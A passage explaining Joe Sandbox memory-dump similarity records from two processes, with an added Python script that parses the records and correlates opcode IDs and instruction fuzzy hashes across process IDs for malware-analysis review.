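The records above are Joe Sandbox per-function similarity entries for the region at 0x7FF848F10000 ("based on PE: false", so not backed by an image on disk) in two processes: the first field of the dump name is the PID in hex (00000010 = 16, 00000014 = 20), matching hcaresult_16_ and hcaresult_20_ in the snapshot file names. What a reviewer wants from such a list is a cross-process correlation: the same Opcode ID, or an almost identical Instruction Fuzzy Hash, at the same base in two PIDs says the same code was present in both. In this excerpt the instruction fuzzy hash 78215121B299... appears twice, and the instruction hashes of 101efca0... (PID 16) and 693fa520... (PID 20) differ in only a few hex digits. The following Python script is an added example, not Joe Sandbox code: it parses records in this layout, derives PID and base from the dump name, cross-checks the PID against the snapshot name, and reports exact and near matches across processes. The sample is constructed from five records copied from the report; the Hamming distance over the fuzzy hash text and the threshold of 10 are assumptions of this example, not the comparison Joe Sandbox itself uses.

```python
# Parse Joe Sandbox "Similarity" records and correlate functions across process
# memory dumps.  Added example; not Joe Sandbox code.
import re
from itertools import combinations

# One record in the layout the report uses; dump-name fields after the base
# address are reproduced verbatim and not interpreted here.
RECORD_FMT = """Memory Dump Source
• Source File: {pid}.00000002.{did}.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_{snap}_2_7ff848f10000_DriverUpdt.jbxd
Similarity
• API ID:
• String ID: {sid}
• API String ID: {asid}
• Opcode ID: {op}
• Instruction ID: {iid}
• Opcode Fuzzy Hash: {op}
• Instruction Fuzzy Hash: {ifh}
"""
# Constructed sample: five records copied from the report.  Columns: pid hex, dump id,
# snapshot pid, opcode id, instruction id, instruction fuzzy hash, string id, api string id.
ROWS = [
    ("00000010", "2672432966", "16", "53293b52b52a23dce6d44392a936546fe74a3fe5e888982f7b8a4b59f6a6551a",
     "f94fc3a5aa57112953f1ce4d07929fc1213104cde811bebc113d793e13ef84f8",
     "C4217C356DA5496FD780FF2880D66FA7FB1FB88214FD04668D90EC3397DE286A048B51", "", ""),
    ("00000010", "2672432966", "16", "101efca0150798ede8f4b8e6c16a34858ce2a56c97e6e6b1b801b1da6871ee9b",
     "07f45a944b7ff5d405eadd153c6bf443762906a915a6e8dca36e47827aeba5c4",
     "B301422090DAC10FF382B3B81C605797FE0DBD1391F0800ABD888C60D7DA189D4483A6", "", ""),
    ("00000014", "2872206114", "20", "fb41de854240ba38326c50718073c637f8350d1875667ea7371585b4a567cba5",
     "b5e193a1116492f6e8597370e6372d659c30129c365dfcd31480d6c2bdfcf6c4",
     "4A51E336A5F61A9FD341FB6CE4A11EA3BB0FF843A5F544176D0488B383DE2C68468794", ";O_$<O_^", "0-3431308889"),
    ("00000014", "2872206114", "20", "11f5b095ed79254e39a77f10772e4590249c2236fe1d6af200be9ad455b155b0",
     "ed1b7de362936619157a2f2bf3f75e65a3f39ee7ea80ebbf6f403d636cdd2533",
     "78215121B2991A9FFB84B7BC545A3BDB2D2EF98751F10017AE40DD32C6EE2C6C414355", "", ""),
    ("00000014", "2872206114", "20", "693fa520d436c86070e05db085e3cdb6476747d5b6aecc97b9d49130a15510d4",
     "59dcb084a93769008a049b50f83bf3616fb06bf0eb187fc227ee8e758b39ac3e",
     "D401426090DAC10FF382B3B818605797FE0DBD5391F0800ABD888C70D7DA18AD4483A6", "", ""),
]
SAMPLE = "".join(RECORD_FMT.format(pid=p, did=d, snap=s, op=o, iid=i, ifh=f, sid=t, asid=a)
                 for p, d, s, o, i, f, t, a in ROWS)

FIELD_RE = re.compile(r"^\s*•\s*([^:]+):\s*(.*?)\s*$")
SOURCE_RE = re.compile(r"^([0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.\d+\.([0-9A-Fa-f]{16})\.")
SNAP_RE = re.compile(r"^hcaresult_(\d+)_")

def parse_records(text):
    """Split report text into one dict per 'Memory Dump Source' record."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "Memory Dump Source":
            cur = {}
            records.append(cur)
        elif cur is not None and (m := FIELD_RE.match(line)):
            cur[m.group(1)] = m.group(2)  # blank report fields become ""
    for r in records:
        m = SOURCE_RE.match(r.get("Source File", ""))
        r["pid"] = int(m.group(1), 16) if m else None  # first dump-name field: PID in hex
        r["base"] = int(m.group(2), 16) if m else None
        r["pe_backed"] = "based on PE: true" in r.get("Source File", "")
        s = SNAP_RE.match(r.get("Snapshot File", ""))
        r["snapshot_pid"] = int(s.group(1)) if s else None
    return records

def inconsistent_pids(records):
    """Records whose dump-name PID disagrees with the snapshot-file PID."""
    return [r for r in records if r["pid"] != r["snapshot_pid"]]

def shared_opcode_ids(records):
    """Opcode IDs present in more than one process: identical function bodies."""
    seen = {}
    for r in records:
        seen.setdefault(r["Opcode ID"], set()).add(r["pid"])
    return {k: v for k, v in seen.items() if len(v) > 1}

def hamming(a, b):
    return sum(x != y for x, y in zip(a, b))

def near_duplicate_pairs(records, max_distance=10):
    """Cross-process pairs whose instruction fuzzy hashes differ in at most
    max_distance hex digits.  Hamming distance over the hash text is an assumed
    proxy; the report does not document Joe Sandbox's own comparison."""
    out = []
    for a, b in combinations(records, 2):
        ha, hb = a.get("Instruction Fuzzy Hash", ""), b.get("Instruction Fuzzy Hash", "")
        if a["pid"] == b["pid"] or not ha or len(ha) != len(hb):
            continue
        if (d := hamming(ha, hb)) <= max_distance:
            out.append((a["Opcode ID"], b["Opcode ID"], d))
    return sorted(out, key=lambda t: t[2])

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(inconsistent_pids(recs), shared_opcode_ids(recs), near_duplicate_pairs(recs))
```

On the sample, no Opcode ID is shared across the two PIDs, the PID cross-check passes, and the only near-duplicate pair is 101efca0.../693fa520... at distance 7 of 70 hex digits. To run it over the full report, paste the whole "Similarity" section into SAMPLE: a distance of 0 with different Instruction IDs, or the same Opcode ID under two PIDs, is the cross-process signal to chase.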